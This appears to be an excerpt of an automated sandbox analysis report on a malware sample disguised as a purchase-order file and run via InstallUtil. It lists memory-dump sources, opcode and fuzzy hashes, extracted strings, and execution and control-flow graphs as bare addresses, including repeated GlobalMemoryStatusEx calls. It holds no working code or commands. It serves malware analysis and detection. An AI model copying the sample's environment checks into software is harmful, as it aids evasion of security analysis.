                                              • Instruction Fuzzy Hash: 58419AB1E056588BEB1CCF6B8C4469EFAF3AFC9300F14C5B9945CAB265DB3149928F41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2170bd7b1f298a039c68d2e99edc16dfacabec903ccca6794dc250afcbf88d06
                                              • Instruction ID: 7d348d48b43937ad9e570079e6bf5d7af209d473645961fa44b1b132d859ed93
                                              • Opcode Fuzzy Hash: 2170bd7b1f298a039c68d2e99edc16dfacabec903ccca6794dc250afcbf88d06
                                              • Instruction Fuzzy Hash: 07414CB1E016188BEB0CCFABC94459EFAF3BFC8300F14C07A9918AB254EB7459428F54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89692ccaaac6f729faf4b0b44bc308d093d95ca14037086179dcde1c4aaf5f30
                                              • Instruction ID: 8f45fdced27b2f16bb16f100474ce71917680fcf95370368b334388a9c647dca
                                              • Opcode Fuzzy Hash: 89692ccaaac6f729faf4b0b44bc308d093d95ca14037086179dcde1c4aaf5f30
                                              • Instruction Fuzzy Hash: 3541EDB4D04208DFCB14CFA9D885AEEBBB5BB89310F10A06AE845B7350C735A901CFA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d68ca4563f843ed2fc6a9d1cdcab6d0b59fdfb434ad2704e2af3b6e491e6f295
                                              • Instruction ID: 756fdff58a07cc9b52bb4d4b2db1387ca18777052dbdd3d8895c0013c07be782
                                              • Opcode Fuzzy Hash: d68ca4563f843ed2fc6a9d1cdcab6d0b59fdfb434ad2704e2af3b6e491e6f295
                                              • Instruction Fuzzy Hash: 854100B9C04258DFDB10CFAAD485AEEFBF5BB49310F14902AE455B7240C738AA45CFA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb03a5ba682c356f2bdd2479960db134962ef05bfe778b104ef6aca415638bf7
                                              • Instruction ID: 6d5b17755f2ad8e6d466c87c020aa0e31da0e99557cc4a1b0c0c20e1887d0b82
                                              • Opcode Fuzzy Hash: eb03a5ba682c356f2bdd2479960db134962ef05bfe778b104ef6aca415638bf7
                                              • Instruction Fuzzy Hash: FC41EEB5C04258DFDB00CFAAD485AEEFBF4BB49310F14942AE459B7240C738AA45CFA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e5ee2825c16b0c474b8ee0b72af2436fc3fe6cb661e9191a9e579a29d008e30
                                              • Instruction ID: 3df3ccf6ea1a28b24954ad39ec59990f6b4e91c787c917c201b3541ad53314c4
                                              • Opcode Fuzzy Hash: 3e5ee2825c16b0c474b8ee0b72af2436fc3fe6cb661e9191a9e579a29d008e30
                                              • Instruction Fuzzy Hash: 4441EB70D04619CBEB28CF6BC8497EEBBF6AF89300F14D0A9C458A7251EB740985DF54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac1ee50d25082542c6d86972daf58395fa9589781ee45ed2833ce0e9f57719e1
                                              • Instruction ID: a6435ea3f83031359449ac78021737864261dfc4f6fecb5b288c4f9f98c50a12
                                              • Opcode Fuzzy Hash: ac1ee50d25082542c6d86972daf58395fa9589781ee45ed2833ce0e9f57719e1
                                              • Instruction Fuzzy Hash: EA312C71D057549BEB69DF2B8C4478AFBF7AFCA200F04C0EA844CAA225D7740A868F11
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 659cde8a87c36e9661d529d2d8a281d760fcf5f2e2e487a84767e3b096856eb3
                                              • Instruction ID: 438b33ababebb4558583a72dc0088e3d0c92ab4de08f7e90e04e3d4757847553
                                              • Opcode Fuzzy Hash: 659cde8a87c36e9661d529d2d8a281d760fcf5f2e2e487a84767e3b096856eb3
                                              • Instruction Fuzzy Hash: C6311C71D046298BEB6CDF5BCC4879AFAF7AFC9300F04C0EA851CA6214DB740A858F01
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c5ec300f3e767559e93fb67a5de7743266ae54b1b94b822d47ec69a2762f2df
                                              • Instruction ID: dd3966f25a18154042a728e6818ba89056e20eab12bca606273f6039c1e76bca
                                              • Opcode Fuzzy Hash: 6c5ec300f3e767559e93fb67a5de7743266ae54b1b94b822d47ec69a2762f2df
                                              • Instruction Fuzzy Hash: BA21EDB5C00218DFDB14CFAAD985AEEFBF4BB49310F14902AE809B7210C735A901CFA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4b161941a38c27fd8989777d5e2af7534874340be8527124ac0f3004f4d5e29f
                                              • Instruction ID: 2f453178237384806a35754f41bb7b2e6d76c75f261a9f4e86d72294d1a12fef
                                              • Opcode Fuzzy Hash: 4b161941a38c27fd8989777d5e2af7534874340be8527124ac0f3004f4d5e29f
                                              • Instruction Fuzzy Hash: 9921A871D05658CBEB2CCF6B89486DDFAF7AFC9300F14C4AA9809AA224DB304A458F44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$%$G$`$i
                                              • API String ID: 0-439984575
                                              • Opcode ID: 5b7cb0a2cde789fe72709f7178869aac170597eac08289d30af770c508bcacd5
                                              • Instruction ID: acb4439f91522420884d6b975a9463e7da2b139e0df70e065db4eb6e5d503c29
                                              • Opcode Fuzzy Hash: 5b7cb0a2cde789fe72709f7178869aac170597eac08289d30af770c508bcacd5
                                              • Instruction Fuzzy Hash: FA61BE74901269DFDB64DF68C888B9DBBB2FB09301F2885D9D449A7250CB35AED0CF94

                                              Execution Graph

                                              Execution Coverage:11.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:27
                                              Total number of Limit Nodes:6
                                              execution_graph 26752 2650848 26754 265084e 26752->26754 26753 265091b 26754->26753 26757 2651340 26754->26757 26763 2651452 26754->26763 26759 2651308 26757->26759 26761 265134b 26757->26761 26758 2651448 26758->26754 26759->26754 26761->26758 26762 2651452 GlobalMemoryStatusEx 26761->26762 26769 2657059 26761->26769 26762->26761 26765 2651356 26763->26765 26766 265145b 26763->26766 26764 2651448 26764->26754 26765->26764 26767 2657059 GlobalMemoryStatusEx 26765->26767 26768 2651452 GlobalMemoryStatusEx 26765->26768 26766->26754 26767->26765 26768->26765 26770 2657063 26769->26770 26771 2657119 26770->26771 26774 5bdce88 26770->26774 26779 5bdce78 26770->26779 26771->26761 26776 5bdce9d 26774->26776 26775 5bdd0b2 26775->26771 26776->26775 26777 5bdd4d0 GlobalMemoryStatusEx 26776->26777 26778 5bdd730 GlobalMemoryStatusEx 26776->26778 26777->26776 26778->26776 26780 5bdce9d 26779->26780 26781 5bdd0b2 26780->26781 26782 5bdd730 GlobalMemoryStatusEx 26780->26782 26783 5bdd4d0 GlobalMemoryStatusEx 26780->26783 26781->26771 26782->26780 26783->26780
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1251 2653e48-2653eae 1253 2653eb0-2653ebb 1251->1253 1254 2653ef8-2653efa 1251->1254 1253->1254 1255 2653ebd-2653ec9 1253->1255 1256 2653efc-2653f54 1254->1256 1257 2653eec-2653ef6 1255->1257 1258 2653ecb-2653ed5 1255->1258 1265 2653f56-2653f61 1256->1265 1266 2653f9e-2653fa0 1256->1266 1257->1256 1259 2653ed7 1258->1259 1260 2653ed9-2653ee8 1258->1260 1259->1260 1260->1260 1262 2653eea 1260->1262 1262->1257 1265->1266 1267 2653f63-2653f6f 1265->1267 1268 2653fa2-2653fba 1266->1268 1269 2653f71-2653f7b 1267->1269 1270 2653f92-2653f9c 1267->1270 1275 2654004-2654006 1268->1275 1276 2653fbc-2653fc7 1268->1276 1271 2653f7d 1269->1271 1272 2653f7f-2653f8e 1269->1272 1270->1268 1271->1272 1272->1272 1274 2653f90 1272->1274 1274->1270 1277 2654008-2654056 1275->1277 1276->1275 1278 2653fc9-2653fd5 1276->1278 1286 265405c-265406a 1277->1286 1279 2653fd7-2653fe1 1278->1279 1280 2653ff8-2654002 1278->1280 1281 2653fe5-2653ff4 1279->1281 1282 2653fe3 1279->1282 1280->1277 1281->1281 1284 2653ff6 1281->1284 1282->1281 1284->1280 1287 2654073-26540d3 1286->1287 1288 265406c-2654072 1286->1288 1295 26540d5-26540d9 1287->1295 1296 26540e3-26540e7 1287->1296 1288->1287 1295->1296 1297 26540db 1295->1297 1298 26540f7-26540fb 1296->1298 1299 26540e9-26540ed 1296->1299 1297->1296 1301 26540fd-2654101 1298->1301 1302 265410b-265410f 1298->1302 1299->1298 1300 26540ef-26540f2 call 2650ab0 1299->1300 1300->1298 1301->1302 1304 2654103-2654106 call 2650ab0 1301->1304 1305 2654111-2654115 1302->1305 1306 265411f-2654123 1302->1306 1304->1302 1305->1306 1310 2654117-265411a call 2650ab0 1305->1310 1307 2654125-2654129 1306->1307 1308 2654133-2654137 1306->1308 1307->1308 1311 265412b 1307->1311 1312 2654147 1308->1312 1313 2654139-265413d 1308->1313 1310->1306 1311->1308 1316 2654148 1312->1316 1313->1312 1315 265413f 1313->1315 1315->1312 1316->1316

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 505 26547d8-2654864 508 2654866-2654871 505->508 509 26548ae-26548b0 505->509 508->509 511 2654873-265487f 508->511 510 26548b2-26548ca 509->510 518 2654914-2654916 510->518 519 26548cc-26548d7 510->519 512 2654881-265488b 511->512 513 26548a2-26548ac 511->513 514 265488d 512->514 515 265488f-265489e 512->515 513->510 514->515 515->515 517 26548a0 515->517 517->513 521 2654918-265495d 518->521 519->518 520 26548d9-26548e5 519->520 522 26548e7-26548f1 520->522 523 2654908-2654912 520->523 529 2654963-2654971 521->529 524 26548f5-2654904 522->524 525 26548f3 522->525 523->521 524->524 527 2654906 524->527 525->524 527->523 530 2654973-2654979 529->530 531 265497a-26549d7 529->531 530->531 538 26549e7-26549eb 531->538 539 26549d9-26549dd 531->539 541 26549ed-26549f1 538->541 542 26549fb-26549ff 538->542 539->538 540 26549df-26549e2 call 2650ab0 539->540 540->538 541->542 546 26549f3-26549f6 call 2650ab0 541->546 543 2654a01-2654a05 542->543 544 2654a0f-2654a13 542->544 543->544 548 2654a07 543->548 549 2654a15-2654a19 544->549 550 2654a23 544->550 546->542 548->544 549->550 551 2654a1b 549->551 552 2654a24 550->552 551->550 552->552

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 553 26547cc-2654864 556 2654866-2654871 553->556 557 26548ae-26548b0 553->557 556->557 559 2654873-265487f 556->559 558 26548b2-26548ca 557->558 566 2654914-2654916 558->566 567 26548cc-26548d7 558->567 560 2654881-265488b 559->560 561 26548a2-26548ac 559->561 562 265488d 560->562 563 265488f-265489e 560->563 561->558 562->563 563->563 565 26548a0 563->565 565->561 569 2654918-265492a 566->569 567->566 568 26548d9-26548e5 567->568 570 26548e7-26548f1 568->570 571 2654908-2654912 568->571 576 2654931-265495d 569->576 572 26548f5-2654904 570->572 573 26548f3 570->573 571->569 572->572 575 2654906 572->575 573->572 575->571 577 2654963-2654971 576->577 578 2654973-2654979 577->578 579 265497a-26549d7 577->579 578->579 586 26549e7-26549eb 579->586 587 26549d9-26549dd 579->587 589 26549ed-26549f1 586->589 590 26549fb-26549ff 586->590 587->586 588 26549df-26549e2 call 2650ab0 587->588 588->586 589->590 594 26549f3-26549f6 call 2650ab0 589->594 591 2654a01-2654a05 590->591 592 2654a0f-2654a13 590->592 591->592 596 2654a07 591->596 597 2654a15-2654a19 592->597 598 2654a23 592->598 594->590 596->592 597->598 599 2654a1b 597->599 600 2654a24 598->600 599->598 600->600
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V*m$\V*m

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1245 5bde178-5bde1b6 1246 5bde1be-5bde1ec GlobalMemoryStatusEx 1245->1246 1247 5bde1ee-5bde1f4 1246->1247 1248 5bde1f5-5bde21d 1246->1248 1247->1248
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 05BDE1DF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1643806871.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_5bd0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V*m
                                              • Instruction ID: 5cec402c05b5a0aaffbe41dad0e056fc374c045a2bbdba4ed40f610773f4d08b
                                              • Opcode Fuzzy Hash: 55ff016bd05fb23641699b0d6353bde0b6477c0311116b09b98997c5d5c78b0a
                                              • Instruction Fuzzy Hash: 1031E7786012214FEB22AB7CF8847993755F786714F1409E6D80ACB256EB68DC468B52
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4e630acb4494299ffea6a5fb012dfa46629e1b9902fa71c16f44a15144466b6
                                              • Instruction ID: 7bba6d6ad5ba0271fae7bd2e305c0cfea53bc272872ff869468ee1e6e704a307
                                              • Opcode Fuzzy Hash: f4e630acb4494299ffea6a5fb012dfa46629e1b9902fa71c16f44a15144466b6
                                              • Instruction Fuzzy Hash: 46212134700214DFD709EBB8E46476E77A7EBC9714F648468E4069B3A9CF369C42DB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76643b6664f323414a3c46ced7a4e098ccc255c73f4bfcaaaeea0f1aae3f654e
                                              • Instruction ID: 8dd3945eb51962f9057b9498ae7fb2685caff95a38d75d543080cfb6972a69c3
                                              • Opcode Fuzzy Hash: 76643b6664f323414a3c46ced7a4e098ccc255c73f4bfcaaaeea0f1aae3f654e
                                              • Instruction Fuzzy Hash: BE21FE72A082548FD705AB78F4607DE3BA2EFC6214F0080AEC101CB296EA259C46C796
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad19499852440e39e827dd4121e9d34128056a014f2043c985e6e7777a7e1058
                                              • Instruction ID: 422ba33d35bca1b9035e0ade9d3a8bfd79207ff406eec3c2b662471b1124c15c
                                              • Opcode Fuzzy Hash: ad19499852440e39e827dd4121e9d34128056a014f2043c985e6e7777a7e1058
                                              • Instruction Fuzzy Hash: 5A318171E11616DBDB05CF64D4906DEB7B2FF89304F14C569E805EB390EB719842CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cb10f5411dca62cc20fe2c5d8f1550b1ab4cd60e25e672cc936d7c7f74790351
                                              • Instruction ID: 3a0ee577ad5ee1a1bc8354e7936bbcda63234b5e4e09126001dfa66027ea9009
                                              • Opcode Fuzzy Hash: cb10f5411dca62cc20fe2c5d8f1550b1ab4cd60e25e672cc936d7c7f74790351
                                              • Instruction Fuzzy Hash: C921F37AB002219BCB11AB7CE85439E77E6FB89651F1008B5D909C7344FB39C8068B90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 97eca98cec2c58085a9a1ef6cca7543627676f14cfeb424265f4f6fd6b83aa31
                                              • Instruction ID: 066a9495c95e6959108d4b990f5c591e6b94f6eb570a7eea119dda704a432648
                                              • Opcode Fuzzy Hash: 97eca98cec2c58085a9a1ef6cca7543627676f14cfeb424265f4f6fd6b83aa31
                                              • Instruction Fuzzy Hash: 45216231E0161ADBDB15DF65D49069EB7B2FF89304F14C519E805EB391EB71E841CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1627263431.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_ccd000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de4abe3ffb97970c1185f634b38b3ec5666ecfbad482db777fe2122a1bc950d7
                                              • Instruction ID: 54086de60e8238f2c8665b4960ef582f112fd0371d7770f2f9bec5b878f549ad
                                              • Opcode Fuzzy Hash: de4abe3ffb97970c1185f634b38b3ec5666ecfbad482db777fe2122a1bc950d7
                                              • Instruction Fuzzy Hash: 6A21F5B2504344EFDB09DF54D9C0F26BB65FB94324F24C57DEA0A0B256C336E856CAA2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4aece3be8230fa2e8ff4cdca916f4a54e6b15a41b14fbb1adff06cf181f3d639
                                              • Instruction ID: aa0644d04d4a63f37692b321e19c4192e67f4bfeb89ec4107c9dea78d1f281be
                                              • Opcode Fuzzy Hash: 4aece3be8230fa2e8ff4cdca916f4a54e6b15a41b14fbb1adff06cf181f3d639
                                              • Instruction Fuzzy Hash: 7A21B375E11215CBDB09CFA4D490ADEB7B2AF89314F108A1AEC16FB340EB709842CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23b9ff2fcfdfa0110435e4232a9985ab4f7ff6fc5c5d850d613314fac0144b48
                                              • Instruction ID: 0e07d3c905713f07e48fbdc6ae33b84d0bb598e5ba75bc972683822eb6f3c46c
                                              • Opcode Fuzzy Hash: 23b9ff2fcfdfa0110435e4232a9985ab4f7ff6fc5c5d850d613314fac0144b48
                                              • Instruction Fuzzy Hash: D821F331A402598FDB58EF78D558AAE77F1EF89304F1044A8E806EB361EB359D01CB91
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1627673492.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_248d000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 389799658a8b446fca70d059eb4917ff657c3c755c9258d5e1c340b650f7f3ac
                                              • Instruction ID: 47e5db0c492ad819601100d82116afc7ee8aee9c567bebbeef58ae313220cd63
                                              • Opcode Fuzzy Hash: 389799658a8b446fca70d059eb4917ff657c3c755c9258d5e1c340b650f7f3ac
                                              • Instruction Fuzzy Hash: 5221F571915344EFDB14EF24D980B1ABB65FB85318F24C56AD84A4B386C336D447CE62
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a02ce8b51e0bb0ba9da9d3600cea04ce28b6e27aeabcce2e68c9c45633c75f57
                                              • Instruction ID: f8cd94d8992f876a226ac9ebe43df3c50ff30fbd464ef5d04821274feb86e61d
                                              • Opcode Fuzzy Hash: a02ce8b51e0bb0ba9da9d3600cea04ce28b6e27aeabcce2e68c9c45633c75f57
                                              • Instruction Fuzzy Hash: F3216230E11619DBDB19CFA5D494A9EB7B2AF89314F10861AEC15FB380DB71A846CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ebd8ecb8a7c6aeebcdff7e79fb099c56af98d944fd693c67e7750d8ecbe98426
                                              • Instruction ID: f3a202c62bb4af5243b6dab02926aaaf6e4fc0230852a510669c433df9efdfd3
                                              • Opcode Fuzzy Hash: ebd8ecb8a7c6aeebcdff7e79fb099c56af98d944fd693c67e7750d8ecbe98426
                                              • Instruction Fuzzy Hash: 20219671A102258BDF25EBB895503EE77E9EB49318F2414BADC09E7701E735C842CB95
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 61b5b511b22a1c28d0c8030cdcdd626fc1326e2f3431551c29cce8ff9a2bbe28
                                              • Instruction ID: 93a02d316f75e6188747b05d3df978d4ad3eb4ec86b538ad771e34dbc3749109
                                              • Opcode Fuzzy Hash: 61b5b511b22a1c28d0c8030cdcdd626fc1326e2f3431551c29cce8ff9a2bbe28
                                              • Instruction Fuzzy Hash: E4213E30B40218CFDB64EB78C5147AE77F2AF8A344F2404A8D90AEB350DB359C41CB91
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aefdee70a11d955a79838f744f6264bb8f8fc02fd9645111ce602f9556cee7a3
                                              • Instruction ID: 5e973d735c4add6ac1ae19c9b53b833ceb607dca830f2312f081b4a5b879b724
                                              • Opcode Fuzzy Hash: aefdee70a11d955a79838f744f6264bb8f8fc02fd9645111ce602f9556cee7a3
                                              • Instruction Fuzzy Hash: 7A21C03C2012118BDB22FB7CF8847993359F78AB10F1049A1D80ACB358EBB8DC448B92
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7623c553c5bddf356283ccfe71e2b048818203ba2812ecb4d35f3f821261a871
                                              • Instruction ID: 4410714ef977d599f0c71b01814a333413f03017dda5e8378910c34e0c17ae2a
                                              • Opcode Fuzzy Hash: 7623c553c5bddf356283ccfe71e2b048818203ba2812ecb4d35f3f821261a871
                                              • Instruction Fuzzy Hash: C721E630B402158FDB58EF78D558BAE77F1AF88304F1044A8E806EB360DB359D01CB91
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d61c97550ca720d772e9354503ebee6c1afcaea6cf0af4a777659b2b66feda26
                                              • Instruction ID: 5790d539470eed0ec4018cdc588d2a87ef3a21382769a7611e242211ddcaeef7
                                              • Opcode Fuzzy Hash: d61c97550ca720d772e9354503ebee6c1afcaea6cf0af4a777659b2b66feda26
                                              • Instruction Fuzzy Hash: 30119130B002289BEF64ABB9D454B6A3355FB89714F20897AD817CF341EB69CC818BC1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1627673492.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_248d000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 025d9a2345bde4a5ff4d58ffb02fb025ae7d1ba8570d773202590843e2418e6f
                                              • Instruction ID: 8ac854bfd900dee2ef02549a95dc8081cf8696355f926a3e139b3da4cafa524a
                                              • Opcode Fuzzy Hash: 025d9a2345bde4a5ff4d58ffb02fb025ae7d1ba8570d773202590843e2418e6f
                                              • Instruction Fuzzy Hash: 7E218075509380DFCB02DF20D990716BF71EB46218F28C5DBD8498F6A7C33A944ACB62
                                              Memory Dump Source
